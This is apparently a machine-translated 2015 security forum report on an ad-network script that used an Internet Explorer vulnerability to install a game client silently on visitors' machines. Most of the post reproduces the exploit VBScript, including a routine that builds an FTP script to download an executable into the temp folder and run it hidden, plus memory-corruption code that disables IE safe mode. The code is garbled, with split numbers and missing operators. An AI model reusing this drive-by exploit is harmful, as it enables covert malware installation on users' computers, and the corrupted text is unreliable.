2 5 2 9 net Union the use of the latest ie vulnerability mandatory installation of light micro-end-bug warning-the black bar safety net

ID MYHACK58:62201557629
Type myhack58
Reporter 佚名
Modified 2015-01-02T00:00:00


I'm using Baidu browser ie compatible mode to browse http://www.dy2018.com this movie site, and found that somehow run the one called“Shine micro-end”of the game client, then I used smartsniff packet capture analysis, in the view source when the found a 2 5 2 9 net Union js advertising code, which is the latest published 1 8 years of aging of the ie vulnerability that! Reference to this js from the IT ftp download kuaidu_2_23_01. exe and run!

Visit http://www. 2 5 2 9. com/page/ms. js you can see this js code, use ie access to the www. dy2018. com or direct reference to this js will be automatically installed on the computer light micro end

function runmumaa() On Error Resume Next Set objWsh = CreateObject("Wscript. Shell")

objWsh. run "cmd.exe /c del /F %temp%\ftp.txt & echo open>>%temp%\ftp.txt & echo bin>>%temp%\ftp.txt & echo bin>>%temp%\ftp.txt & echo bin>>%temp%\ftp.txt & echo bin>>%temp%\ftp.txt & echo bin>>%temp%\ftp.txt & echo bin>>%temp%\ftp.txt & echo user>>%temp%\ftp. txt&echo anonymous>>%temp%\ftp. txt&echo testpass>>%temp%\ftp. txt&echo get kuaidu_2_23_01.exe>>%temp%\ftp.txt & echo bye>>%temp%\ftp.txt ",0,true

objWsh. run "cmd.exe /c cd %temp% & ftp-s:""%temp%\ftp.txt""",0,true

wscript. sleep 1 0 0 0

objWsh. run """%temp%\kuaidu_2_23_01.exe""",0,true

document. write(Err. Description) end function

dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray


function Begin() On Error Resume Next info=Navigator. UserAgent

if(instr(info,"Win64")>0) then exit function end if

if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function

end if


BeginInit() If Create()=True Then myarray= chrw(0 1)&chrw(2 1 7 6)&chrw(0 1)&chrw(0 0)&chrw(0 0)&chrw(0 0)&chrw(0 0)&chrw(0 0) myarray=myarray&chrw(0 0)&chrw(3 2 7 6 7)&chrw(0 0)&chrw(0)

if(intVersion<4) then document. write("<br> IE") document. write(intVersion) runshellcode() else setnotsafemode() end if end if end function

function BeginInit() Randomize() redim aa(5) redim ab(5) a0=1 3+1 7rnd(6) a3=7+3rnd(5) end function

function Create() On Error Resume Next dim i Create=False For i = 0 To 4 0 0 If Over()=True Then 'document. write(i) Create=True Exit For End If Next end function

sub testaa() end sub

function mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2)

ab(0)=0 aa(a1)=i ab(0)=6.36598737437801 E-3 1 4

aa(a1+2)=myarray ab(2)=1.74088534731324 E-3 1 0 mydata=aa(a1) redim Preserve aa(a0) end function

function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) i=readmemo(i+1, 6) j=readmemo(i+&h134) for k=0 to &h60 step 4 j=readmemo(i+&h120+k) if(j=1 4) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0)

j=0 j=readmemo(i+&h120+k)

Exit for end if

next ab(2)=1.69759663316747 E-3 1 3 runmumaa() end function

function Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000

redim Preserve aa(a0) redim ab(a0)

redim Preserve aa(a2)

type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=1 0

If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)1 6 j=vartype(aa(a1-1)) if((j=mem+4) or (j8=mem+8)) thenif(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function

end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if

If(type1=&h2f66) Then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If

redim Preserve aa(a0)

end function

function ReadMemo(add) On Error Resume Next redim Preserve aa(a2)

ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747 E-3 1 3 ReadMemo=lenb(aa(a1))


redim Preserve aa(a0) end function

[1] [2] next